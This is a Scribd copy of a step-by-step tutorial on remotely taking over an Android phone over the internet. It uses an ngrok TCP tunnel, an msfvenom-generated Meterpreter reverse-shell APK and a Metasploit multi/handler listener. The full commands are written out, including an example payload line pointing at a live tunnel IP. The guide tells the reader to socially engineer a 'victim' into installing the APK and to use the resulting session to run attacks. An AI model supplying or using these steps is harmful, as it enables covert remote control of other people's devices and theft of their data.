Scribd
Upload
1K views9 pages

Android Hacking Through WAN

This document provides instructions on how to gain remote access to an Android device over WAN using Kali Linux, NGROK TCP tunneling, and Metasploit. It involves: 1. Setting up an NGROK TCP tunnel on port 80 to redirect traffic to Metasploit on the local machine. 2. Generating a Metasploit Android payload that connects back over the tunnel and starting a listener. 3. Sending the payload APK to the target Android device and waiting for them to install it. 4. Once the payload is installed, the attacker gains a Metasploit session and remote command line access to the compromised device.

Uploaded by

Isuru sandakelum
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
1K views9 pages

Android Hacking Through WAN

This document provides instructions on how to gain remote access to an Android device over WAN using Kali Linux, NGROK TCP tunneling, and Metasploit. It involves: 1. Setting up an NGROK TCP tunnel on port 80 to redirect traffic to Metasploit on the local machine. 2. Generating a Metasploit Android payload that connects back over the tunnel and starting a listener. 3. Sending the payload APK to the target Android device and waiting for them to install it. 4. Once the payload is installed, the attacker gains a Metasploit session and remote command line access to the compromised device.

Uploaded by

Isuru sandakelum
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 9

Contents

How to Gain Access to an Android Over WAN.......................................................................................1


Step 1: - Load Up Your Kali Shell........................................................................................................1
Step 2: - Download NGROK TCP Tunneling......................................................................................1
Step 3: - Sign Up....................................................................................................................................2
Step 4: - Start an NGROK TCP Server and POSTGRESQL............................................................2
Step 5: - Make an MSF Payload...........................................................................................................2
Step 6: - Start a Listener.......................................................................................................................3
Step 7: - Configure the Listener...........................................................................................................4
Step 8: - Send the Payload.....................................................................................................................5
Step 9: - ATTACK!...............................................................................................................................9

How to Gain Access to an Android Over


WAN
 By Adam Carley
 11/19/2017 4:56 pm

Android phones are very easy to break into if the victim can be Social Engineered into doing so.
If you use Kali, you may have done this but probably in your own network. This guide shows
you how to do so but over HTTP tunneling to a phone anywhere in the world.

Step 1: - Load Up Your Kali Shell


Load up your Kali Linux Shell

Step 2: - Download NGROK TCP Tunneling


It can be found here: https://ngrok.com/download. Download the correct architecture for your
device.
(This can be found by running 'uname -m')
Then unzip the file with:

unzip "/path-to-ngrok.zip"
Step 3: - Sign Up
The sign-up page can be found here: https://ngrok.com/signup. Then run the command to
activate your AUTH Token

Step 4: - Start an NGROK TCP Server and POSTGRESQL


We can do this with the following command

sudo service postgresql start


./ngrok tcp 80

This will start a TCP server on port 80

Step 5: - Make an MSF Payload


First, we need to ping the IP of the NGROK TCP site with the following command

ping 0.tcp.ngrok.io

Next, we must generate a Metasploit APK Payload with the following command

msfvenom -p android/meterpreter/reverse_tcp LHOST=<ngrok ip> LPORT=<port displayed in


ngrok> R> (name of file).apk

The ngrok port is displayed here:


Example:

msfvenom -p android/meterpreter/reverse_tcp LHOST=52.15.183.149 LPORT= 18198 R >


nullbyte.apk

Step 6: - Start a Listener


Once the Payload is generated, we can start a listener. There should be an apk file ready for you
to send now.
We can start a listener with this command:

msfconsole
Step 7: - Configure the Listener
To start the payload listener, we must now enter these commands:

msf use exploit/multi/handler


set payload android/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 80
exploit

Congrats! You have successfully created a payload listener!


Step 8: - Send the Payload
Now we must send the payload to the target, I have transferred the file to my android for these
purpose
We need to wait for the victim to install the file.
Step 9: - ATTACK!
Now we have access to the android device. Type:

sessions
sessions 1

We can now do many different attacks on the android phone, type

help

to see a variety of attacks to perform

Happy Hacking!

You might also like